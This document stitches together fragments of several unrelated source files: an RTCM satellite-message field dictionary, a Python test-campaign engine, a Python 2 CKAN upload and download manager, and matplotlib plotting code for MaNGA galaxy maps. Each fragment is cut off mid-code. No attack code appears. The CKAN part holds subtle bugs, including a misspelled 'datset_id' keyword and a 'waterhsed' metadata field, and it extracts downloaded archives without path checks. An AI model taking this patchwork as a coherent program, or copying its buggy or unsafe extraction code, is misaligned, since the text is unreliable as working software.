"DF436": "QZSS ∆n",
"DF437": "QZSS M0",
"DF438": "QZSS Cuc",
"DF439": "QZSS e",
"DF440": "QZSS Cus",
"DF441": "QZSS A½",
"DF442": "QZSS toe",
"DF443": "QZSS Cic",
"DF444": "QZSS Ω0",
"DF445": "QZSS Cis",
"DF446": "QZSS i0",
"DF447": "QZSS Crc",
"DF448": "QZSS ω",
"DF449": "QZSS Ω0n DOT",
"DF450": "QZSS i0-DOT",
"DF451": "QZSS Codes on L2 Channel",
"DF452": "QZSS Week Number",
"DF453": "QZSS URA",
"DF454": "QZSS SV health",
"DF455": "QZSS TGD",
"DF456": "QZSS IODC",
"DF457": "QZSS Fit Interval",
},
"1045": {
"DF002": "Message Number",
"DF252": "Galileo Satellite ID",
"DF289": "Galileo Week Number",
"DF290": "Galileo IODnav",
"DF291": "Galileo SV SISA",
"DF292": "Galileo Rate of Inclination (IDOT)",
"DF293": "Galileo toc",
"DF294": "Galileo af2",
"DF295": "Galileo af1",
"DF296": "Galileo af0",
"DF297": "Galileo Crs",
"DF298": "Galileo ∆n",
"DF299": "Galileo M0",
"DF300": "Galileo Cuc",
"DF301": "Galileo Eccentricity (e)",
"DF302": "Galileo Cus",
"DF303": "Galileo A½",
"DF304": "Galileo toe",
"DF305": "Galileo Cic",
"DF306": "Galileo Ω0",
"DF307": "Galileo Cis",
"DF308": "Galileo i0",
"DF309": "Galileo Crc",
"DF310": "Galileo ω",
"DF311": "Galileo ΩDOT",
"DF312": "Galileo BGD (E1/E5a)",
"DF314": "Galileo E5a Signal Health Status (OSHS)",
"DF315": "Galileo E5a Data Validity Status (OSDVS)",
"DF001_7": "Reserved",
},
"1046": {
"DF002": "Message Number",
"DF252": "Galileo Satellite ID",
"DF289": "Galileo Week Number",
"DF290": "Galileo IODnav",
"DF286": "Galileo SISA Index (E1,E5b)",
"DF292": "Galileo Rate of Inclination (IDOT)",
"DF293": "Galileo toc",
"DF294": "Galileo af2",
"DF295": "Galileo af1",
"DF296": "Galileo af0",
"DF297": "Galileo Crs",
"DF298": "Galileo ∆n",
"DF299": "Galileo M0",
"DF300": "Galileo Cuc",
"DF301": "Galileo Eccentricity (e)",
"DF302": "Galileo Cus",
"DF303": "Galileo A½",
"DF304": "Galileo toe",
"DF305": "Galileo Cic",
"DF306": "Galileo Ω0",
"DF307": "Galileo Cis",
"DF308": "Galileo i0",
"DF309": "Galileo Crc",
"DF310": "Galileo ω",
"DF311": "Galileo ΩDOT",
"DF312": "Galileo BGD (E1/E5a)",
"DF313": "Galileo BGD (E5b,E1)",
"DF316": "Galileo E5b Signal Health Status",
"DF317": "Galileo E5b Data Validity Status",
"DF287": "Galileo E1b Signal Health Status",
"DF288": "Galileo E1b Data Validity Status",
"DF001_2": "Reserved",
},
"1057": {
"DF002": "Message Number",
"DF385": "GPS Epoch Time 1s",
"DF391": "SSR Update Interval",
"DF388": "Multiple Message Indicator",
"DF375": "Satellite Reference Datum",
"DF413": "IOD SSR",
"DF414": "SSR Provider ID",
"DF415": "SSR Solution ID",
"DF387": "No. of Satellites",
"group": (
"DF387",
{
"DF068": "GPS Satellite ID",
"DF071": "GPS IODE",
"DF365": "Delta Radial",
"DF366": "Delta Along-Track",
"DF367": "Delta Cross-Track",
"DF368": "Dot Delta Radial",
"DF369": "Dot Delta Along-Track",
"DF370": "Dot Delta Cross-Track",
},
),
},
"1058": {
"DF002": "Message Number",
"DF385": "GPS Epoch Time 1s",
"DF391": "SSR Update Interval",
"DF388": "Multiple Message Indicator",
"DF413": "IOD SSR",
"DF414": "SSR Provider ID",
"DF415": "SSR Solution ID",
"DF387": "No. of Satellites",
"group": (
"DF387",
{
"DF068": "GPS Satellite ID",
"DF376": "Delta Clock C0",
"DF377": "Delta Clock C1",
"DF378": "Delta Clock C2",
},
),
},
"1059": {
"DF002": "Message Number",
"DF385": "GPS Epoch Time 1s",
"DF391": "SSR Update Interval",
"DF388": "Multiple Message Indicator",
"DF413": "IOD SSR",
"DF414": "SSR Provider ID",
"DF415": "SSR Solution ID",
"DF387": "No. of Satellites",
| |
device_parameters: List of device parameters to override default values in Device_Catalog.
:type device_parameters: list
:param flash_file_path: Flash file full path.
:type flash_file_path: str
:param random_mode: Enable random mode if your campaign is configured to run random TC.
:type random_mode: bool
:param user_email: Valid user email.
:type user_email: str
:param credentials: Credentials in User:Password format.
:type credentials: str
:rtype: bool
:return: True if setup is correctly done, else False
"""
status = None
device_name = kwargs["device_name"]
serial_number = kwargs["serial_number"]
campaign_name = kwargs["campaign_name"]
campaign_relative_path = kwargs["campaign_relative_path"]
device_parameters = kwargs["device_parameter_list"]
random_mode = kwargs["random_mode"]
user_email = kwargs["user_email"]
credentials = kwargs["credentials"]
log_level_param = kwargs["log_level"]
# In case the uuid is not set, generate it to ensure that the campaign has an id
# This id is used for reporting purpose
self.__logger.info('Checking metacampaign UUID integrity...')
metacampaign_uuid = kwargs["metacampaign_uuid"]
valid_uuid = is_uuid4(metacampaign_uuid)
if not valid_uuid:
self.__logger.warning("Metacampaign UUID is empty or not a valid UUID4; a new one is generated ...")
metacampaign_uuid = metacampaign_uuid if valid_uuid else str(uuid.uuid4())
self.__logger.info("Metacampaign UUID is {0}".format(metacampaign_uuid))
self.__init_configuration(**kwargs)
# Init Campaign report path
self.__init_report_path(campaign_name)
# Instantiate a live reporting interface
campaign_name = os.path.splitext(os.path.basename(campaign_name))[0]
self.__init_live_reporting(campaign_name,
metacampaign_uuid,
user_email,
kwargs.get("live_reporting_plugin"))
self.__stop_on_critical_failure = Util.str_to_bool(
self.__global_config.campaignConfig.get("stopCampaignOnCriticalFailure", "False"))
self.__stop_on_first_failure = Util.str_to_bool(
self.__global_config.campaignConfig.get("stopCampaignOnFirstFailure", "False"))
# Provide the global configuration for equipment manager and device manager
# They will use it to retrieve or set values in it.
EquipmentManager().set_global_config(self.__global_config)
DeviceManager().set_global_config(self.__global_config)
# Initialize equipments necessary to control DUT (io card, power supply, usb hub)
EquipmentManager().initialize()
# Read serial number if given as ACS command line
if serial_number not in ["", None]:
# Priority to serialNumber from --sr parameter
device_parameters.append("serialNumber=%s" % str(serial_number))
# Load the device
device = DeviceManager().load(device_name, device_parameters)[Util.AcsConstants.DEFAULT_DEVICE_NAME]
# store the device config file
device_conf_list = []
for dev in DeviceManager().get_all_devices():
device_config_file = dev.get_config("DeviceConfigPath")
if device_config_file:
device_conf_list.append(device_config_file)
self._campaign_elements.update({"devices": device_conf_list})
# Init the logger
self.__init_logger(device.hw_variant_name, serial_number, self.campaign_report_path, metacampaign_uuid)
self.__logger.info('Checking acs version : %s' % str(Util.get_acs_release_version()))
if self.__test_case_conf_list:
if random_mode:
self.__test_case_conf_list = self.__randomize_test_cases(self.__test_case_conf_list)
# Parse parameter catalog
parameter_catalog_parser = ParameterCatalogParser()
self.__global_config.__setattr__("parameterConfig", parameter_catalog_parser.parse_catalog_folder())
# Retrieve MTBF custom parameter to align logging level between the console and the log file
is_logging_level_aligned = Util.str_to_bool(
self.__global_config.campaignConfig.get("isLoggingLevelAligned", "False"))
# Set log level according to global_config file content
if log_level_param:
logging_level = log_level_param
else:
logging_level = self.__global_config.campaignConfig.get("loggingLevel", "DEBUG")
ACSLogging.set_log_level(logging_level, is_logging_level_aligned)
# Set campaign_type when it exists
campaign_type = self.__global_config.campaignConfig.get("CampaignType")
# Set credentials
self.__global_config.__setattr__("credentials", credentials)
# Init reports
self.__init_reports(self.campaign_report_path,
device_name, campaign_name, campaign_relative_path,
campaign_type, user_email, metacampaign_uuid)
# Creates Test case Manager object
self.__test_case_manager = TestCaseManager(self.__test_report,
live_reporting_interface=self._live_reporting_interface)
# Setup Test Case Manager
tcm_stop_execution = self.__test_case_manager.setup(self.__global_config,
self.__debug_report,
self.__test_case_conf_list[0].do_device_connection)
status = tcm_stop_execution
else:
status = AcsBaseException.NO_TEST
return status
def _send_create_testcase_info(self, execution_request_nb):
"""
This function aims at creating all test cases reporting data
at beginning of campaign so that max information is available
as soon as possible
:param execution_request_nb: nb of times to execute the campaign
:type execution_request_nb: integer
"""
tc_order = 1
for execution_iteration in range(execution_request_nb):
for tc_index, tc_conf in enumerate(self.__test_case_conf_list):
uc_name = tc_conf.get_ucase_name()
tc_name = tc_conf.get_name()
tc_phase = tc_conf.get_phase()
tc_type = tc_conf.get_type()
tc_domain = tc_conf.get_domain()
is_warning = tc_conf.get_is_warning()
tc_parameters = tc_conf.get_params().get_params_as_dict()
self._live_reporting_interface.send_create_tc_info(tc_name,
uc_name,
tc_phase,
tc_type,
tc_domain,
tc_order,
is_warning,
tc_parameters)
tc_order += 1
# Only MAX_TC_NB_AUTHORIZED will be scheduled and executed by ACS
if tc_order > MAX_TC_NB_AUTHORIZED:
break
else:
continue
break
def execute(self, is_arg_checking=True, **kwargs):
"""
This function is the entry point of ACS solution when called by Test Runner.
It parses the arguments given to CampaignEngine,
parses XML files associated & read the campaign content
for the TestCaseManager to execute.
:param is_arg_checking: Whether or not ACS arguments are checked
:type is_arg_checking: bool
:param kwargs: ACS arguments
:type kwargs: dict
"""
error = None
global_results = Util.ACSResult(verdict=Util.ExitCode.FAILURE)
execution_iteration = 1
# Index of test case inside loop on campaign
tc_order = 1
stop_execution = False
verdicts = {}
acs_outcome_verdicts = {}
acs_outcome_status = False
self.__campaign_metrics.campaign_start_datetime = datetime.now()
try:
arg_checker = ArgChecker(**kwargs)
if is_arg_checking:
error = arg_checker.check_args(False)
if error:
raise AcsBaseException("INVALID_PARAMETER", error)
params = arg_checker.args
campaign_name = params["campaign_name"]
params["campaign_relative_path"] = os.path.dirname(campaign_name)
execution_request_nb = params["execution_request_nb"]
random_mode = params["random_mode"]
device_parameters = params["device_parameter_list"]
Paths.FLASH_FILES = params["flash_file_path"]
# Log acs param
self.__log_acs_param(params)
# Check if device parameters is a list
if not isinstance(device_parameters, list):
device_parameters = []
# Set test campaign status : campaign is in setup phase
global_results.status = Util.Status.INIT
setup_status = self._setup(**params)
# setup successfully completed
if setup_status is None:
total_tc_to_execute = execution_request_nb * len(self.__test_case_conf_list)
if total_tc_to_execute > MAX_TC_NB_AUTHORIZED:
self.__logger.warning("Total number of TCs ({0}) exceeds maximum number authorized ({1})."
.format(total_tc_to_execute, MAX_TC_NB_AUTHORIZED))
self.__logger.warning("Only first {0} TCs will be executed".format(MAX_TC_NB_AUTHORIZED))
total_tc_to_execute = MAX_TC_NB_AUTHORIZED
self.__campaign_metrics.total_tc_count = total_tc_to_execute
# Send live report if enabled
self._send_create_testcase_info(execution_request_nb)
# Log extra acs param for metrics
self._log_acs_param_extra(params)
# Execute test cases of campaign
# Set test campaign status : campaign is starting
global_results.status = Util.Status.ONGOING
while execution_iteration <= execution_request_nb and not stop_execution:
stop_execution, tc_order = self._execute_test_cases(verdicts, tc_order, acs_outcome_verdicts)
execution_iteration += 1
if random_mode:
self.__test_case_conf_list = self.__randomize_test_cases(self.__test_case_conf_list)
if tc_order > MAX_TC_NB_AUTHORIZED:
break
if not stop_execution:
LOGGER_FWK_STATS.info("event=STOP_ON_EOC")
# Set test campaign status : campaign is completed
global_results.status = Util.Status.COMPLETED
else:
# Set test campaign status : campaign has been interrupted during test suite execution
global_results.status = Util.Status.ABORTED
# Exception occurred during setup
else:
self.__log_stop_campaign(setup_status)
# Set test campaign status
global_results.status = Util.Status.ABORTED
(status, acs_outcome_status) = self._all_tests_succeed(verdicts, acs_outcome_verdicts)
if status:
global_results.verdict = Util.ExitCode.SUCCESS
except (KeyboardInterrupt):
LOGGER_FWK_STATS.info("event=STOP_ON_USER_INTERRUPT")
self.__log_stop_campaign("USER INTERRUPTION")
# Set test campaign status
global_results.status = Util.Status.ABORTED
except (SystemExit):
LOGGER_FWK_STATS.info("event=STOP_ON_SYSTEM INTERRUPT")
self.__log_stop_campaign("SYSTEM INTERRUPTION")
# Set test campaign status
global_results.status = Util.Status.ABORTED
except Exception as exception:
if isinstance(exception, AcsBaseException):
error = str(exception)
LOGGER_FWK_STATS.info("event=STOP_ON_EXCEPTION; error={0}".format(error))
if self.__logger is not None:
self.__logger.error(error)
else:
print(error)
else:
ex_code, ex_msg, ex_tb = Util.get_exception_info(exception)
LOGGER_FWK_STATS.info("event=STOP_ON_EXCEPTION; error={0}".format(ex_msg))
if self.__logger is not None:
self.__logger.error(ex_msg)
self.__logger.debug("Traceback: {0}".format(ex_tb))
self.__logger.debug("return code is {0}".format(ex_code))
else:
print (ex_msg)
print ("Traceback: {0}".format(ex_tb))
print ("return code is {0}".format(ex_code))
# add an explicit message in the last executed TC's comment
if self.__test_report is not None:
self.__test_report.add_comment(tc_order, str(exception))
self.__test_report.add_comment(tc_order,
("Fatal exception : Test Campaign will be stopped. "
"See log file for more information."))
# Set test campaign status
global_results.status = Util.Status.ABORTED
finally:
# Sending Campaign Stop info to remote server (for Live Reporting control)
self._live_reporting_interface.send_stop_campaign_info(verdict=global_results.verdict,
status=global_results.status)
if self.__test_case_manager is not None:
campaign_error = bool(global_results.verdict)
try:
cleanup_status, global_results.dut_state = self.__test_case_manager.cleanup(campaign_error)
except AcsBaseException as e:
cleanup_status = False
global_results.dut_state = Util.DeviceState.UNKNOWN
error = str(e)
if self.__logger is not None:
if error:
self.__logger.error(error)
self.__logger.info("FINAL DEVICE STATE : %s" % (global_results.dut_state,))
else:
if error:
print error
print ("FINAL DEVICE STATE : %s" % (global_results.dut_state,))
else:
cleanup_status = True
if not cleanup_status:
global_results.verdict = Util.ExitCode.FAILURE
for verdict in verdicts:
if not Util.Verdict.is_pass(verdicts[verdict]):
tc_name = str(verdict).split(self.VERDICT_SEPARATOR)[0]
tc_verdict = verdicts[verdict]
msg = "ISSUE: %s=%s\n" % (tc_name, tc_verdict)
sys.stderr.write(msg)
# Wait for last LiveReporting action requests
self._live_reporting_interface.wait_for_finish()
if self.__test_report:
# write data in report files
self.__write_report_info()
# update the metacampaign result id in xml report file
# this action is done at the end because the connection retry with live reporting server will done
# throughout campaign execution
self.__test_report.write_metacampaign_result_id(self._live_reporting_interface.campaign_id)
if self.campaign_report_path is not None:
# Archive test campaign XML report
self.__logger.info("Archive test campaign report...")
# Compute checksum
_, archive_file = zip_folder(self.campaign_report_path, self.campaign_report_path)
self._live_reporting_interface.send_campaign_resource(archive_file)
# Display campaign metrics information to the user
self._display_campaign_metrics(self.__campaign_metrics)
# Close logger
ACSLogging.close()
if acs_outcome_status and cleanup_status:
global_results.verdict = Util.ExitCode.SUCCESS
else:
global_results.verdict = Util.ExitCode.FAILURE
return global_results
def campaign_metrics(self):
"""
Provide Campaign metrics
:return: CampaignMetrics
"""
return self.__campaign_metrics
def _execute_test_cases(self, verdicts, tc_order, acs_outcome_verdicts):
"""
Execute test cases of current campaign and update verdicts for current campaign iteration
:param verdicts: dictionnary of verdicts of all campaign iterations
:param tc_order: index of the test in the whole campaign iterations
:param acs_outcome_verdicts: dictionnary of verdicts which take in account if TC is_warning
:return: stop_execution, tc_order
"""
# Flag to stop camapaign
stop_execution = False
# Index in current campaign execution
tc_index = 0
# Verdict of the current test case being executed
verdict = None
# Current TestCaseConf object
tcase_conf = None
# Run all Test Cases
while tc_index < len(self.__test_case_conf_list):
tcase_conf = self.__test_case_conf_list[tc_index]
if | |
#!/usr/bin/env python
import datetime
from glob import glob
import os
import re
from requests import get
from shutil import rmtree
import tarfile
import zipfile
from tethys_dataset_services.engines import CkanDatasetEngine
#------------------------------------------------------------------------------
#Main Dataset Manager Class
#------------------------------------------------------------------------------
class CKANDatasetManager(object):
"""
This class is used to find, zip and upload files to a CKAN data server
#note: this does not delete the original files
"""
def __init__(self, engine_url, api_key, model_name,
dataset_notes="CKAN Dataset",
resource_description="CKAN Resource",
date_format_string="%Y%m%d"):
if engine_url.endswith('/'):
engine_url = engine_url[:-1]
if not engine_url.endswith('api/action') and not engine_url.endswith('api/3/action'):
engine_url += '/api/action'
self.dataset_engine = CkanDatasetEngine(endpoint=engine_url, apikey=api_key)
self.model_name = model_name
self.dataset_notes = dataset_notes
self.resource_description = resource_description
self.date_format_string = date_format_string
def initialize_run(self, watershed, subbasin, date_string):
"""
Initialize run for watershed upload/download
"""
self.watershed = watershed.lower()
self.subbasin = subbasin.lower()
self.date_string = date_string
self.date = datetime.datetime.strptime(self.date_string, self.date_format_string)
self.dataset_name = '%s-%s-%s-%s' % (self.model_name,
self.watershed,
self.subbasin,
self.date.strftime("%Y%m%d"))
self.resource_name = '%s-%s-%s-%s' % (self.model_name,
self.watershed,
self.subbasin,
self.date_string)
def make_tarfile(self, file_path):
"""
This function packages the dataset into a tar.gz file and
returns the path
"""
base_path = os.path.dirname(file_path)
output_tar_file = os.path.join(base_path, "%s.tar.gz" % self.resource_name)
if not os.path.exists(output_tar_file):
with tarfile.open(output_tar_file, "w:gz") as tar:
tar.add(file_path, arcname=os.path.basename(file_path))
return output_tar_file
def make_directory_tarfile(self, directory_path, search_string="*"):
"""
This function packages all of the datasets into a tar.gz file and
returns the path
"""
base_path = os.path.dirname(directory_path)
output_tar_file = os.path.join(base_path, "%s.tar.gz" % self.resource_name)
if not os.path.exists(output_tar_file):
directory_files = glob(os.path.join(directory_path,search_string))
with tarfile.open(output_tar_file, "w:gz") as tar:
for directory_file in directory_files:
tar.add(directory_file, arcname=os.path.basename(directory_file))
return output_tar_file
def get_dataset_id(self):
"""
This function gets the id of a dataset
"""
# Use the json module to load CKAN's response into a dictionary.
response_dict = self.dataset_engine.search_datasets({ 'name': self.dataset_name })
if response_dict['success']:
if int(response_dict['result']['count']) > 0:
return response_dict['result']['results'][0]['id']
return None
else:
return None
def create_dataset(self):
"""
This function creates a dataset if it does not exist
"""
dataset_id = self.get_dataset_id()
#check if dataset exists
if not dataset_id:
#if it does not exist, create the dataset
result = self.dataset_engine.create_dataset(name=self.dataset_name,
notes=self.dataset_notes,
version='1.0',
tethys_app='erfp_tool',
waterhsed=self.watershed,
subbasin=self.subbasin,
month=self.date.month,
year=self.date.year)
dataset_id = result['result']['id']
return dataset_id
def upload_resource(self, file_path, overwrite=False, file_format='tar.gz'):
"""
This function uploads a resource to a dataset if it does not exist
"""
#create dataset for each watershed-subbasin combo if needed
dataset_id = self.create_dataset()
if dataset_id:
#check if dataset already exists
resource_results = self.dataset_engine.search_resources({'name':self.resource_name},
datset_id=dataset_id)
try:
#determine if results are exact or similar
same_ckan_resource_id = ""
if resource_results['result']['count'] > 0:
for resource in resource_results['result']['results']:
if resource['name'] == self.resource_name:
same_ckan_resource_id = resource['id']
break
if overwrite and same_ckan_resource_id:
#delete resource
"""
CKAN API CURRENTLY DOES NOT WORK FOR UPDATE - bug = needs file or url,
but requres both and to have only one ...
#update existing resource
print resource_results['result']['results'][0]
update_results = self.dataset_engine.update_resource(resource_results['result']['results'][0]['id'],
file=file_to_upload,
url="",
date_uploaded=datetime.datetime.utcnow().strftime("%Y%m%d%H%M"))
"""
self.dataset_engine.delete_resource(same_ckan_resource_id)
if not same_ckan_resource_id or overwrite:
#upload resources to the dataset
return self.dataset_engine.create_resource(dataset_id,
name=self.resource_name,
file=file_path,
format=file_format,
tethys_app="erfp_tool",
watershed=self.watershed,
subbasin=self.subbasin,
forecast_date=self.date_string,
description=self.resource_description)
else:
print "Resource", self.resource_name ,"exists. Skipping ..."
except Exception,e:
print e
pass
def zip_upload_file(self, file_path):
"""
This function uploads a resource to a dataset if it does not exist
"""
#zip file and get dataset information
print "Zipping files for watershed: %s %s" % (self.watershed, self.subbasin)
tar_file_path = self.make_tarfile(file_path)
print "Finished zipping files"
print "Uploading datasets"
resource_info = self.upload_resource(tar_file_path)
os.remove(tar_file_path)
print "Finished uploading datasets"
return resource_info
def zip_upload_directory(self, directory_path, search_string="*", overwrite=False):
"""
This function uploads a resource to a dataset if it does not exist
"""
#zip file and get dataset information
print "Zipping files for watershed: %s %s" % (self.watershed, self.subbasin)
tar_file_path = self.make_directory_tarfile(directory_path, search_string)
print "Finished zipping files"
print "Uploading datasets"
resource_info = self.upload_resource(tar_file_path, overwrite)
os.remove(tar_file_path)
print "Finished uploading datasets"
return resource_info
def get_resource_info(self):
"""
This function gets the info of a resource
"""
dataset_id = self.get_dataset_id()
if dataset_id:
#check if dataset already exists
resource_results = self.dataset_engine.search_resources({'name': self.resource_name},
datset_id=dataset_id)
try:
if resource_results['result']['count'] > 0:
for resource in resource_results['result']['results']:
if resource['name'] == self.resource_name:
#upload resources to the dataset
return resource
except Exception,e:
print e
pass
return None
def get_dataset_info(self):
"""
This function gets the info of a resource
"""
# Use the json module to load CKAN's response into a dictionary.
response_dict = self.dataset_engine.search_datasets({ 'name': self.dataset_name })
if response_dict['success']:
if int(response_dict['result']['count']) > 0:
for dataset in response_dict['result']['results']:
if dataset['name'] == self.dataset_name:
#upload resources to the dataset
return dataset
return None
else:
return None
def download_resource_from_info(self, extract_directory, resource_info_array, local_file=None):
"""
Downloads a resource from url
"""
data_downloaded = False
#only download if file does not exist already
check_location = extract_directory
if local_file:
check_location = os.path.join(extract_directory, local_file)
if not os.path.exists(check_location):
print "Downloading and extracting files for watershed:", self.watershed, self.subbasin
try:
os.makedirs(extract_directory)
except OSError:
pass
for resource_info in resource_info_array:
#for resource
file_format = resource_info['format']
local_tar_file = "%s.%s" % (resource_info['name'], file_format)
local_tar_file_path = os.path.join(extract_directory,
local_tar_file)
if os.path.exists(local_tar_file_path):
print "Local raw file found. Skipping ..."
data_downloaded = False
try:
r = get(resource_info['url'], stream=True)
with open(local_tar_file_path, 'wb') as f:
for chunk in r.iter_content(chunk_size=1024):
if chunk: # filter out keep-alive new chunks
f.write(chunk)
f.flush()
if file_format.lower() == "tar.gz":
with tarfile.open(local_tar_file_path) as tar:
tar.extractall(extract_directory)
elif file_format.lower() == "zip":
with zipfile.ZipFile(local_tar_file_path) as zip_file:
zip_file.extractall(extract_directory)
else:
print "Unsupported file format. Skipping ..."
except Exception, ex:
print ex
data_downloaded = False
pass
try:
os.remove(local_tar_file_path)
except OSError:
pass
print "Finished downloading and extracting file(s)"
return data_downloaded
else:
print "Resource exists locally. Skipping ..."
return False
def download_resource(self, extract_directory, local_file=None):
"""
This function downloads a resource
"""
resource_info = self.get_resource_info()
if resource_info:
return self.download_resource_from_info(extract_directory,
[resource_info],
local_file)
else:
print "Resource not found in CKAN. Skipping ..."
return False
def download_prediction_resource(self, watershed, subbasin, date_string, extract_directory):
"""
This function downloads a prediction resource
"""
self.initialize_run(watershed, subbasin, date_string)
self.download_resource(extract_directory)
#------------------------------------------------------------------------------
#ECMWF RAPID Dataset Manager Class
#------------------------------------------------------------------------------
class ECMWFRAPIDDatasetManager(CKANDatasetManager):
"""
This class is used to find and download, zip and upload ECMWFRAPID
prediction files from/to a data server
"""
def __init__(self, engine_url, api_key):
super(ECMWFRAPIDDatasetManager, self).__init__(engine_url,
api_key,
'erfp',
"ECMWF-RAPID Flood Predicition Dataset",
'This dataset contians NetCDF3 files produced by '
'downscalsing ECMWF forecasts and routing them with RAPID',
"%Y%m%d.%H"
)
def initialize_run_ecmwf(self, watershed, subbasin, date_string):
"""
Initialize run for watershed upload/download custom for ecmwf
"""
self.watershed = watershed.lower()
self.subbasin = subbasin.lower()
self.date_string = date_string[:11]
self.date = datetime.datetime.strptime(self.date_string, self.date_format_string)
self.dataset_name = '%s-%s-%s-%s' % (self.model_name,
self.watershed,
self.subbasin,
self.date.strftime("%Y%m%dt%H"))
def update_resource_ensemble_number(self, ensemble_number):
"""
Set ensemble number in resource name for ecmwf resource
"""
self.resource_name = '%s-%s-%s-%s-%s' % (self.model_name,
self.watershed,
self.subbasin,
self.date_string,
ensemble_number)
def update_resource_return_period(self, return_period):
"""
Set ensemble number in resource name for ecmwf resource
"""
self.resource_name = '%s-%s-%s-%s-warning_points_%s' % (self.model_name,
self.watershed,
self.subbasin,
self.date_string,
return_period)
def get_subbasin_name_list(self, source_directory, subbasin_name_search):
"""
Get a list of subbasins in directory
"""
subbasin_list = []
outflow_files = sorted(glob(os.path.join(source_directory,'Qout_*.nc')))
for outflow_file in outflow_files:
subbasin_name = subbasin_name_search.search(os.path.basename(outflow_file)).group(1)
if subbasin_name not in subbasin_list:
subbasin_list.append(subbasin_name)
return subbasin_list
def zip_upload_warning_points_in_directory(self, directory_path, search_string="return_*_points.txt"):
"""
This function packages all of the datasets into individual tar.gz files and
uploads them to the dataset
"""
base_path = os.path.dirname(directory_path)
return_period_search = re.compile(r'return_(\d+)_points\.txt')
#zip file and get dataset information
print "Zipping and uploading warning points files for watershed: %s %s" % (self.watershed, self.subbasin)
directory_files = glob(os.path.join(directory_path,search_string))
for directory_file in directory_files:
return_period = return_period_search.search(os.path.basename(directory_file)).group(1)
self.update_resource_return_period(return_period)
#tar.gz file
output_tar_file = os.path.join(base_path, "%s.tar.gz" % self.resource_name)
if not os.path.exists(output_tar_file):
with tarfile.open(output_tar_file, "w:gz") as tar:
tar.add(directory_file, arcname=os.path.basename(directory_file))
#upload file
self.upload_resource(output_tar_file)
os.remove(output_tar_file)
print "%s datasets uploaded" % len(directory_files)
def zip_upload_forecasts_in_directory(self, directory_path, search_string="*.nc"):
"""
This function packages all of the datasets into individual tar.gz files and
uploads them to the dataset
"""
base_path = os.path.dirname(directory_path)
ensemble_number_search = re.compile(r'Qout_\w+_(\d+)\.nc')
#zip file and get dataset information
print "Zipping and uploading files for watershed: %s %s" % (self.watershed, self.subbasin)
directory_files = glob(os.path.join(directory_path,search_string))
for directory_file in directory_files:
ensemble_number = ensemble_number_search.search(os.path.basename(directory_file)).group(1)
self.update_resource_ensemble_number(ensemble_number)
#tar.gz file
output_tar_file = os.path.join(base_path, "%s.tar.gz" % self.resource_name)
if not os.path.exists(output_tar_file):
with tarfile.open(output_tar_file, "w:gz") as tar:
tar.add(directory_file, arcname=os.path.basename(directory_file))
#upload file
resource_info = self.upload_resource(output_tar_file)
os.remove(output_tar_file)
print "%s datasets uploaded" % len(directory_files)
return resource_info
def zip_upload_resources(self, source_directory):
"""
| |
import os
import gc
import numpy as np
import numpy.ma as ma
import matplotlib
matplotlib.use('TKAgg')
import matplotlib.pyplot as plt
###############################################################################
###############################################################################
###############################################################################
def plot_vband_image(v_band, gal_ID, IMAGE_DIR=None, IMAGE_FORMAT='eps', ax=None):
'''
Creates a plot of the v-band flux map
Parameters:
===========
v_band : numpy array of shape (n,n)
v_band flux map
gal_ID : string
MaNGA plate number - MaNGA fiberID number
IMAGE_DIR : string
Path of directory to store images
IMAGE_FORMAT : string
Format of saved image. Default is eps
ax : matplotlib.pyplot axis object
Axes handle on which to create plot
'''
###########################################################################
# Dimensions of array
#--------------------------------------------------------------------------
array_length = v_band.shape[0] # y-coordinate distance
array_width = v_band.shape[1] # x-coordinate distance
###########################################################################
###########################################################################
v_band_cbar_ticks = np.linspace( 0, v_band.max(), 7)
for val, i in zip( v_band_cbar_ticks, range( len( v_band_cbar_ticks))):
val = '%.3f' % val
v_band_cbar_ticks[i] = val
if ax is None:
fig, ax = plt.subplots()
ax.set_title( gal_ID + ' Visual Band')
v_band_im = ax.imshow( v_band, origin='lower')
cbar = plt.colorbar( v_band_im, ax=ax, ticks = np.linspace( 0, v_band.max(), 6))
cbar.ax.tick_params( direction='in', color='white')
cbar.set_label('Visual Band Flux [$10^{-17}$ erg s$^{-1}$ cm$^{-2}$]')
ax.set_xticks( np.arange( 0, array_width, 10))
ax.set_yticks( np.arange( 0, array_length, 10))
ax.tick_params( axis='both', direction='in', color='white')
ax.yaxis.set_ticks_position('both')
ax.xaxis.set_ticks_position('both')
ax.set_xlabel('spaxel')
ax.set_ylabel('spaxel')
###########################################################################
###########################################################################
# Save figure
#--------------------------------------------------------------------------
if IMAGE_DIR is not None:
#######################################################################
# Create output directory if it does not already exist
#----------------------------------------------------------------------
if not os.path.isdir( IMAGE_DIR + '/unmasked_v_band'):
os.makedirs( IMAGE_DIR + '/unmasked_v_band')
#######################################################################
plt.savefig( IMAGE_DIR + '/unmasked_v_band/' + gal_ID + '_v_band_raw.' + IMAGE_FORMAT, format=IMAGE_FORMAT)
#######################################################################
# Figure cleanup
#----------------------------------------------------------------------
#plt.show()
plt.cla()
plt.clf()
plt.close()
del cbar, v_band_im
gc.collect()
#######################################################################
###############################################################################
###############################################################################
###############################################################################
def plot_sMass_image(sMass,
gal_ID,
IMAGE_DIR=None,
IMAGE_FORMAT='eps',
ax=None):
'''
Creates a plot of the stellar mass density map
Parameters:
===========
sMass : numpy array of shape (n,n)
stellar mass density map
gal_ID : string
MaNGA plate number - MaNGA fiberID number
IMAGE_DIR : string
Path of directory to store images
IMAGE_FORMAT : string
Format of saved image. Default is eps
ax : matplotlib.pyplot axis object
Axes handle on which to create plot
'''
###########################################################################
# Dimensions of array
#--------------------------------------------------------------------------
array_length = sMass.shape[0] # y-coordinate distance
array_width = sMass.shape[1] # x-coordinate distance
###########################################################################
###########################################################################
sMass_max = ma.max(sMass)
sMass_cbar_ticks = np.linspace( 0, sMass_max, 7)
for val, i in zip( sMass_cbar_ticks, range( len( sMass_cbar_ticks))):
val = '%.3f' % val
sMass_cbar_ticks[i] = val
if ax is None:
fig, ax = plt.subplots()
ax.set_title( gal_ID + ' stellar mass density')
sMass_im = ax.imshow( sMass, origin='lower')
cbar = plt.colorbar( sMass_im, ax=ax, ticks = sMass_cbar_ticks)
cbar.ax.tick_params( direction='in', color='white')
cbar.set_label(r'stellar mass density [log($M/M_\odot$)]')
ax.set_xticks( np.arange( 0, array_width, 10))
ax.set_yticks( np.arange( 0, array_length, 10))
ax.tick_params( axis='both', direction='in', color='white')
ax.yaxis.set_ticks_position('both')
ax.xaxis.set_ticks_position('both')
ax.set_xlabel('spaxel')
ax.set_ylabel('spaxel')
###########################################################################
###########################################################################
# Save figure
#--------------------------------------------------------------------------
if IMAGE_DIR is not None:
#######################################################################
